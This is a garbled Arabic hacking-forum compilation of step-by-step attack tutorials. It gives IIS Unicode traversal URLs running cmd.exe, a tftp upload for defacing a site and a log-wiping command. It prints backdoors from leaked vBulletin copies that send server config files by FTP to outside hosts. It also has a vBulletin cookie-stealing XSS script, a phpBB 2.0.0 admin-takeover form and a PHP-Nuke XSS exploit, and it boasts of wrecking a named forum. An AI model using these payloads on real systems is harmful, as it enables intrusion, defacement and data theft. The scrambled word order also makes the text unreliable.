بهذه شهيرة مواقع عدة اختراق في االن يفكرون عامة المبتدئين الطريقة
غير او الشهيرة المواقع مع مجدية غير الطريقة هذه ال ولكن
الشهيرةتي ان او الفين ويندوز في اال التوجد الضعفهذه نقطة الن
اليونكسواللنكس انظمة تستخدم الشهيرة المواقع وأغلبتطلع يوم وكل محدودة حمايته نظام الفين او تي ان ويندوز ان أي
جديدة ثغراتاالضعاف نقاط ضعفمن نقطة ايقاف المواقع مدراء بوسع لكن
تي االن في الموجودةالهكرة من لهم حاجزا جعلو يكونون قد الطريقة بتلك لكن
ليسدائما ولكنالمتصفح داخل من وتنفذ
كاالتي الثغرة تنفيذ : وطريقةhttp://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.e
xe?/c+dir+c:\ الثغرة تنفيذ بدأت كوم دوت بعد االن هنا ركزو
السي رؤية وليسفقط ملف اي دخول أيضا :c وبإمكانك الثغرة هذهملفات عرضجميع بــ لك تسمح
وهي ثغرة من أكثر وتوجد/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\
المتصفح من تنفيذها وطريقةالموقع اسم بعد تنفيذها ومكان
: مثالhttp://www.xxxxx.com/à/€/à/€/à/€/¯....2/cmd.exe/?/c\+
كوم دوت بعد أييظهر شكل اي على او يظهر مالذي الناسيسألون بعض
بسيط الحلDir الملفات لك الدوسستظهر نافذة في بكتابته قمت لو االمر هذا
تقريبا المتصفح في الملفات ظهور وطريقةالدوس بنفسطريقة
في فتبدأ امامك الملفات واظهرت الثغرة تنفيذ في نجحت إذاالثانية تنفيذالخطوة
تحميله تريد الذي للملف ابلود عمل الثانية الخطوةخبرة الى اليحتاج أيضا األبلود وعملابلود تعمل لكي شروط هنالك لكن
الضحية الموقع على مثبت بي تي إف التي أن من التأكد يجب
االتي إتبع تتأكد وللكيالسستم ملف على الدخول تضيف 32يجب أن يجب تدخله ولكي
تنفيذها في نجحت التي الثغرة على الكلمات بعض :مثال
http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c:\
الملفات ورأيت المطلوب الموقع في عملت الثغرة هذهالتغير الحظ
http://www.xxxxxx.com/scripts/..Á ../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32\
الويندوز داخل متواجدة لملفات أسماء هو الثغرة على ماوضعWinnt\Sytem32\
تتأكد لكي الملفات هذه على الدخول عليك يجب أيمع ..... متطابقة ليست نستخدمها التي الثغرة يتسالون القراء بعضباي الدخول عليك يجب للتطابقها ليسشرط هذا ولكن الثغرة هذه
السستم مللف على كانالثغرة هذه معاه اشتغلت القراء احد يكون ممكن
http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\ السستم ملف على ادخل كيف ويقول
على تدخل لكي الملفات اسماء إضافة عليك يجب واحد هو الحل32السستم
االمتداد هذا بعد ايc+dir+c:\ الملفات أسماء تضيف هنا
http://www.xxxxx.com/scripts/..ü€€€...Winnt/System32/ خبرة الى التحتاج سابقا قلنا كما
محتوياته لك ستظهر السستم ملف دخول وبعديسمي برنامج عن البحث آنذاك على ويجب
tftp.exe في انه من وتتأكد ماتلقاه الين البرنامج هذا على دور يعني الجهاز
للصفحة ابلود تعمل لكي شرط يعتبر البرنامج هذا النرايح ماهو تعبك الله بإذن يعني بالخير اتفاءل البرنامج لقيت ولو
الفاضي على.................................................. .......................................
هو الثاني والشرطبي تي إف التي برنامج عندك يكون أن يجب
العنوان هذا من تنزله تقدر البرنامج وهذاwww.geocities.com/anorR1234/tftpd32.zip
C:\ تحطه إنك االفضل من منه الضغط وتفك البرنامج ماتنزل وبعدالـ داخل
في أبلود لها تعمل أن تريد التي الصفحة أو البرامج أيضا وتحط السي
الموقع دالخل الى مو جهازك داخل الى السي في تحطهالبرنامج وتشغل
tftp32.exe األساسية مهمتك من تنتهى أن الى يعمل وتتركهC:\ في شي كل وحط كالمي أسمع
المهمه تنجح راح الله بإذن حطيتها لو ألنك-----------------------------------------------------------------
الملفات تحميل وهي الخطرة النقطة في بدأنا االناالبلود بالتحميل اقصد أني العلم مع
أي
تحميل = أبلودتجميل مو
ألني بالخير متفائل أنا بس نسبيا معقدة طريقة الملفات وتحميلتفهمو راح أنكم معتقد
لموضوعنا نرجع المهمالمتصفح الى ايضا تضاف الملفات نسخ طريقة المهم
الطريقة بهذه وتضاف : مثال
http://www.xxxxx.com/scripts/..ü€€€....exe?/c+dir+c:\ معاك اشتغلت هذه الثغرة تخيل
امر تضيف لكي الثغرة من بعضاإلضافات تمسح إنك عليك ويجب النسخ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
االضافة هذه بيكون الثغرة من نمسحه راح الى يعني/c+dir+c:\ بدالها تظيف عشان
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
الطريقة بهذا لنا بيطلع النسخ امر نظيف ولمنhttp://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-
i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm اتغير الى إش ياشباب شايفين
النسخ أمر في الالزم تغير إنك أيضا بسالزم مثل
tftp.exe الى بي تي اف التي برنامج اسم النه حاله في سيبه هذااالن ومشغله السي في حاطه
"-i" مهم النه سيبه برضه هذاتتأكد 1.1.1.1 وعشان جهازك تبع االيبي تكتب هذا االرقام بدال هنا
االيبي وهذا ايبي يطلع راح بي تي اف التي تشغب لمن االيبي منتكتبه الى هو طلعلك الى
GET نسخ في شرط تعتبر النها حالها في سيبها االضافة هذه المفات
index.htm عاد تغيرها وممكن تتحمل راح الى الصفحة اسم هذهانت بكيفك
C:\inetpub\wwwroot\ الخاصة الرئيسة الصفحة تواجد مكان وهذا بالموقع
index.htm يظهر أن تريده التي الملف او الصفحة إسم تكتب هناالموقع في
C:\ جهازك في تحميلها المراد الصفحة حاط إنك من التأكد يجبالـ داخل
index.htm الصفحة اسم ومثالصارت االن الثغرة ان من تاكد الملف تنسخ عشان انتر ماتضغط قبل
الثغرة هذه لمثل مشابهاhttp://www.xxxxx.com/scripts/..ü€€€...xe?/c+tftp.exe+"-
i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroo t\index.htm
الله على وتوكل إنتر اضغط لها مشابها طلعت ولوالملف يتنسخ راح الله وبإذن
----------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------- واالهم االخيرة النقطة وفى
مثل عنك معلومات ومكونة الجهاز داخل تجمعت تكون ملفات مسح االيبي
http://server/msadc/..À¯../..../c+del+c:/*.log --------------------------------------
*******************
وحقيقة 5 العرب المعربين ودور النت في المنتشره النسخهوتعريبهم الموضوع
موقعه ثغرات رغم جون منتديات اليخترقوا لماذا قلنا كما النه1اوال نضيفه نسخه يستخدم
مصمممي 1 جيد وعارفين ثغرات مليان بالنت الموجود النسخهاذا ينشرونه الماذا $المنتدي
كود ومسحت نفذت لو الكي التبليغ كود ومحتوي تجريبي النسخهبنفسك لكشفته فكرك تشغل لو ثغراته من تهرب لن التبليغ
لمدة 2 تكون ان بدال بضعتهم لترويج تجريبي نسخه جميعه انهفهمتموني 30 يوما
مواقع 3 من علي نحصل نسخه هو باالنترنت االمنتشره النسخهوحيلهم الغرب هكرز من انت وينك صح هكرز
الشركة نسخة علي الحصول في تمكنت منتشره% 100لو ونسخه اليه اضافوا بل منه التبليغ كود بحذف قاموا لرئيتصح النت في
- انه يوكد النسخه صاحب االخ يجي وبعدين وثغرات وبالوي كودادجون بمنتديات ثغرة لقي
ارتفع اعالناته وسعر موقعه انشهر يندهشكييييييفخالص والعالمالزوار لكثر موقعه في
فيه العب وكيفة مكانه يعرف ونفسه الكود اضاف نفسه هو الحقيقةاالمور هكذا والله
االجانب من نذال اقل ليسوا العرب المعربين
باانفسكم نسخكم بتعريب انصحكم
بعضنسخ في ثغره اكتشاف تم بسيطه فتره لنا 2.2.5قبل المسربه ملف في فيها الموجود الكود هذا وكان العرب اخواننا forum من
PHP:--------------------------------------------------------------------------------
if )$action=="modify"( {$vbxh = h;$vbxt = t;
$vbxp = p;$vbxw = w;$vbxa = a;$vbx1 = 1;$vbxr = r;$vbxb = b;$vbxn = n;$vbxe = e;$vbxo = o;$vbxy =y;$vbxl = l;
echo ">!-- ";$file =
fopen)"$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vb
xe$vbxt/~$vbxr$vbxo$vbxy$vbxa$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
ME", "r"(;$rf = fread)$file, 1000(;
fclose)$file(;echo " --<";
--------------------------------------------------------------------------------
موقع في يتصل هذا الحلو الكود وكان
http://www.arab1.net/
http://www.arab1.net/~royal/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NAME
نسخه نزلت االيام مع كود 2.2.6عموما وشالوا حبايبنا لنا وسربوها االخوه تجسسونعم كود لنا يحطون عشان عليهم ياعيني التبليغ
المسلمين العرب
المره الكود االول زي وغبي مكشوف ومهو اذكى الكود بسهالمرهملف ملفين في موجود option هذي باالخير
PHP:
--------------------------------------------------------------------------------echo ">!-- ";
include "$sqlupdate";echo " --<";
--------------------------------------------------------------------------------
functions وملف
PHP:--------------------------------------------------------------------------------
$sqlupdate = base64_decode)'aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9
5YWwvLngyLmluYw=='(;
--------------------------------------------------------------------------------
وانكود ديكود باكدوا نلعب نعرف صرنا الذكاء على ياعيني
ديكود فيه مستخدمين اللي هذا الحلو الكود يتصل بعد هذي والمرههذا بالموقع
http://saudi.no-ip.com/ويقولكم فيكم WELCOME TO arab1.net بيرحب
عالترحيب ياعيني
بالصفحه بيتصل الكود عموما http://saudi.no-ip.com/~royal/.x2.inc هذي رهييييييب كود فيها اللي
وعرب ....... كمسلمين علينا يحسبون اللي لنا ويبينالكود شوفو
PHP:--------------------------------------------------------------------------------
>div id="sHo" style="display:none;"<>!--
if you are seeing this code PlzZzZz Contact [email][email protected]
>?phpsystem)"mkdir /tmp/.statics"(;
system)"cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf"(;system)"cp /usr/local/apache/conf/httpd.conf
/tmp/.statics/httpd2.conf"(;system)"cp admin/config.php /tmp/.statics/php.conf"(;
system)"tar -cvf /tmp/.statics.tgz /tmp/.statics"(;$vilename = "$SERVER_NAME.bz";
$port = base64_decode)'aHB5NWk5'(;
$conn_id = ftp_connect)"cyber-sa.virtualave.net"(; $login_result = ftp_login)$conn_id, "cyber-sa", "$port"(;
$upload = ftp_put)$conn_id, "/tmp/$vilename", "/tmp/.statics.tgz", FTP_BINARY(;
ftp_quit)$conn_id(; system)"rm -rf /tmp/.statics.tgz"(;
system)"rm -rf /tmp/.statics"(;$base = "$HTTP_HOST&h2=$SCRIPT_NAME";
$open = "http://saudi.no-ip.com/~royal/.x2.php?h=$base";$file = fopen)"$open", "r"(;
$rf = fread)$file, 1000(;fclose)$file(;
?<--<
>/div<
بيعرف هو ملفه في العرب دار كان واخره
************
6 بنسبة المخترقين من ومنتدياتكم% 80الحمايه الاجهزتكم
حماية الحل اليكم المنتديات اختراق نسمع يوم كل اليكم% 80يالله وحمايته اخترقه اسباب
االدمن 1 بمجلد ثغرات وجود2 مود مجلد ثغرةاالستيل 3 ثغرة
الهتمل 4كوكيز 5
6 التلنت دعم7 Cfgwiz32.exe ويندوز المجلد C:\Windows على
8 الملف misc منلحصول 9 المخترق قبل من لك ارسله تم باتشبجهازك وجود
بمعلوماتك
******
الحماية كيفية
جيدا 1 االدمن ملف بحماية سرفرات htaccess. قم في فقط شغلالينوكسليسويندوز
بحمايته 2 htaccess. قمباالمنتدي 3 ثغرة يسببب كثير ستيالت التركب
ابدا 4 الهتمل لغة التفعلدائما 5 نظفجاهزك الكوكز من احذر
6 التحتاجه عندما لموقع نيت التل بتوقيف قمباسم 7 ملف وجود عدم من ويندوز Cfgwiz32.exe نأكد المجلد على
C:\Windowsله 8 حل عن البحث جاري فيه الدنيا بلوووووي ده
بجهازك 9 الفيروسات برامج بتركيب قمانواع 10 كافة علي لحصولك االحمر العقرب منتديات بزيارت قم
وموقع لجهازك . الحماية
،،،انتهى
منتديات ".29 في " vBulletin 2,2,9ثغرة
> مصر ابن منتدى من >منقول> المدمر: >الكاتب
المنتديات بحاية وتؤدي جدا خطيرة الثغرة ....vBulletin 2.2.9 هذه
كالتالي شرحها :المهم
بامتداد -1 بالمفكرة واحفظه الكود php انسخ>?PHP
// vBulletin XSS Injection Vulnerability: Exploit // ---
// Coded By : Sp.IC )[email protected](. // Descrption: Fetching vBulletin's ******s and storing it into a log
file.
// Variables:
$LogFile = "******s.Log";
// Functions: /*
If )$HTTP_GET_VARS['Action'] = "Log"( { $Header = ">!--"; $Footer = "---<";
} Else {
$Header = ""; $Footer = "";
} Print )$Header(;
*/ Print )">Title<vBulletin XSS Injection Vulnerability:
Exploit>/Title<"(; Print )">Pre<"(;
Print )">Center<"(; Print )">B<vBulletin XSS Injection Vulnerability: Exploit>/B<\n"(;
Print )"Coded By: >B<>A Href=\"MailTo:[email protected]\"<Sp.IC>/A<>/B<>Hr
Width=\"20%\"<"(; /*
Print )$Footer(; */
Switch )$HTTP_GET_VARS['Action']( { Case "Log":
$Data = $HTTP_GET_VARS['******']; $Data = StrStr )$Data, SubStr )$Data, BCAdd )0x0D, StrLen
)DecHex )MD5 )NULL((((((; $Log = FOpen )$LogFile, "a+"(;
FWrite )$Log, Trim )$Data( . "\n"(; FClose )$Log(;
Print )">**** HTTP-&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\"
&@#&@#&@#&@#&@#&@#&@#=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\"<"(;
Break; Case "List":
If )!File_Exists )$LogFile( || !In_Array )$Records(( { Print )">Br<>Br<>B<There are No Records>/B<>/Center<>/Pre<"(;
Exit )(; }
Else { Print )">/Center<>/Pre<"(;
$Records = Array_UniQue )File )$LogFile((; Print )">Pre<"(;
Print )">B<.:: Statics>/B<\n"(; Print )"\n"(;
Print )"o Logged Records : >B<" . Count )File )$LogFile(( . ">/B<\n"(;
Print )"o Listed Records : >B<" . Count )$Records( . " >/B<[Not Counting Duplicates]\n"(;
Print )"\n"(;
Print )">B<.:: Options>/B<\n"(; Print )"\n"(;
If )Count )File )$LogFile(( < 0( { $Link['Download'] = "[>A Href=\"" . $LogFile .
"\"<Download>/A<]"; }
Else{ $Link['Download'] = "[No Records in Log]";
}
Print )"o Download Log : " . $Link['Download'] . "\n"(; Print )"o Clear Records : [>A Href=\"" . $SCRIPT_PATH. "?
Action=Delete\"<Y>/A<]\n"(;
Print )"\n"(; Print )">B<.:: Records>/B<\n"(;
Print )"\n"(;
While )List )$Line[0], $Line[1]( = Each )$Records(( { Print )">B<" . $Line[0] . ": >/B<" . $Line[1](;
} }
Print )">/Pre<"(; Break;
Case "Delete": @UnLink )$LogFile(;
Print )">Br<>Br<>B<Deleted Succsesfuly>/B<>/Center<>/Pre<"( Or Die )">Br<>Br<>B<Error: Cannot Delete
Log>/B<>/Center<>/Pre<"(; Print )">**** HTTP-
&@#&@#&@#&@#&@#=\"&@#&@#&@#&@#&@#&@#&@#\" &@#&@#&@#&@#&@#&@#&@#=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\"<"(; Break;
} ?<
يدعم -2 لموقع الملف php ارفعاللينك -3 هذا على يضغط الضحية اجعل
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
[script code] واستبدال بهذا
>Script<location='Http://[ تحميله تم الذي الملف ?[مكانAction=Log&******='+)document.******(;>/Script<
العنوان -4 هذا ألى إذهبhttp://%20 /تحميله مكان تم الذي الملف ?Action=List
،،،انتهى
منتديات " " phpbb 2.0.0 اختراق> العرب رواد منتديات من >منقول
phpbb 2.0.0
بالـ شبيه vbوهو
تااافه يعتبر بل جدا سهل وهو
بالله سمو يالله
PhpBB2ملف admin_ug_auth.php في
:الوصفمدير تكون بأن تصريح تأخذ أن الثغرة هذه خالل من يمكنك
المنتدى على العام والمشرفشئت متى التحكم لوحة الى الدخول يمكنك وبذلك
:األصدار2.0.0
بالمنتدى سجل اوال الثغرة لتجربةبالمنتدى عضويتك رقم احفظ ثم
اليها مايلي وانسخ المفكرة افتح بعدها
>html<>head<>/head<>body<
>form method="post" action="http://www.domain_name/board_directory/admin/admin_
ug_auth.php"<User Level: >select name="userlevel"<
>option value="admin"<Administrator>/option<>option value="user"<User>/option<>/select<
>input type="hidden" name="private[1]" value="0"<>input type="hidden" name="moderator[1]" value="0"<
>input type="hidden" name="mode" value="user"<>input type="hidden" name="adv" value=""<
User Number: >input type="text" name="u" size="5"<>input type="submit" name="submit" value="Submit"<
>/form<>/body<>/html<
الموقع عنوان الى العنوان هذا عدلhttp://www.domain_name/board_directory المستهدف
بامتداد htmlاخفظهتجد سوف بحفظها قمت التي الصفحة الى تدخل عندما
اختر الثغرة لتطبيق تريده الذي التصريح اختيار يتم والتي قائمةAdministrator تصريح
بالمنتدى عضويتك رقم شع الجانبي بالمربع ثمزر submit أضغط
المستخدم اسم ضع الدخول تسجيل شاشة تاتيك سوف بعدهابك الخاصة المرور وكلمة
ماتريد !! أفعل المنتدى تحكم لوحة في نفسك تجد سوف ثممنتداك المنتدى
بستعرفو منقول صرااحه الدرسوهو سهولت شفتو وسالااامتكم
تطبيق وعليه اال انزله حبيت ما
ذا المنتدا شووفوو
http://forums.xos.ca/
البااقيه المواقع عقبال لله والحمد ...تدمر،،،انتهى
في ".30 " php nuke ثغرة> مصر ابن منتدى من >منقول
> ايسر: > الكاتب
ال في ثغره لك .. php nuke فيه تتيح دي الثغره عليها اقولكم حبيتالشخصيه الصوره مكان بدل الجافا و الهتمل اكواد ....... تنفيذ
حيشتمني اغلبكم اكيد االول السطر تقروا ما اول انكم عارف اناهو - - باه ده ايه يقول و متعود انا بسعادي اباحه االلفاظ باكثر
الصوره بدل جافا و هتمل اكواد تنفيذ يقولنا عشان هنا مدخلنا !!! !!!! اوي عبيط اما بس؟؟؟ ؟؟؟ !!! الشخصيه
ايه بيها تعملوا ممكن حقولكم الموضوع اخر في ..... لكن
مواقع : ) زي اعمل اني ساحاول كالتالي الثغره ان المهمثغره ( تعرض تيجي لم المحترمه السيكيوريتي
المصابه : االصدارات
PHP Nuke versionh 6.0 منها االقل و
: االستخدام
سكريبتمن الجافا و الهتمل اكواد تنفيذ في قلت كما تستخدمالشخصيه صورهم مكان .خالل
للثغره :ملخصعام
باختيار يطالب فانه المجله في بالتسجيل يقوم عندم مستخدم ايفي الموجوده الصور من مجموعه خالل من ذلك و شخصيه صوره
هذا .... images/forum/avatars/ المجلد
ال .. لكنها و بيز الداتا في الصوره اسم بوضع المجله تقوم عندئذكود على يحصل ان يوزر اي استطاع اذا انه اي كود اي بوضع تقوم
الشخصيه الصوره اختيار صندوق يغير ان استطاع و المجله فورمصندوق الهتمل .. text الى كود يكتب ان ممكن انه اعتقد اذن عادي
عايزه هوه !!!! اللي
:االكسبلويت
و ذلك بعد الدخول و المجله في بالتسجيل تقوم ن عليك اوالصفحه الى الىصفحه Your Account الذهاب الذهاب منها Your و
Info خالل من الصفحه سورسكود باظهار عليك ذلك view بعدsource كلمه عن البحث uid و
كده زي حاجه تالقي : الزم
>input type="hidden" name="uid" value="2111"<
كان المثال في هوه اللي دي االي رقم عرفت انت يبقى كده2111 ...
اسم اي تسميه و باد النوت في ده الكود تحفظ نك ذلك بعد عليكتغيير html بامتداد مالحظه /http://nukesite مع المجله عنوان الى
:...... الهدف
>!-- START CODE --!< >form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post"<
>b<Code )'"<[code]>b '(>/b<>input type="text"name="user_avatar" size="30"
maxlength="30"<>br<>br<
>b<Username>/b<>input type="text" name="uname" size="30"
maxlength="255"<>br<>b<User ID:>input type="text"name="uid"
size="30"<>input type="hidden" name="op"value="saveuser"<>input
type="submit" value="Save Changes"<>/form< >!-- END CODE --!<
ال ملف تشغيل عليك االن الكود .. htmlو كتابه عليك خانه اول هذابالعالمه يبدأ ن يجب انه مراعاه مع تنفيذه : المطلووب
"<
بالعالمه ينتهي ممكن و
>b
اسم ... كده بعد ضع العرض عند الكود في مشاكل اي تجد ال حتىبعدين و دي االي رقم و صفحه submit اليوزر في نفسك تجد سوفYour Account .. تشغيله تم الكود كده و بك !!!! الخاصه
مثال تكتبه ممكن للي : مثال
"<>h1<TESTING>/h1<>b
الكلمه حيطبع ده الشخصيه TESTING طبعا صورتك !!.... مكان
العالمه بعد مسافه فيه ان بالك خلي
">b
كود بروكين تجد سوف واال منها بالك .. خلي
هو تشغله انك ممكن اللي للكود حد كراكتر 30اقصى ....
ثغرات تنفذ ممكن انك اقوله عايز كنت انا انت xss اللي حاجه اي اومن =( لمزيد اياه الهتمل كود اغالق بسبب تنفذها مشعارف
؟؟ ليساكثر كمثال الدرسهذا راجع المعلومات
: الحل
الله و !!!! لسه
بركاته و الله رحمه و عليكم السالم ...و،،،انتهى
للهاكر " العربية المنتديات " أفضل
بجميع الهاك مجال في العربية والمنتديات المواقع أفضل لكم أقدمعرفتي حد على :::مجالته
المنتدى لقوانين إحتراما أضعها لنwww.3asfh.net
[caution] بالمعلومات جدا غني الموضوع هذا المبتدئين و للمحترفينتحياتي تقبلوا و لكم مرجعا Kinga7MED Hacker فجعلوه
[email protected][/caution]،،31.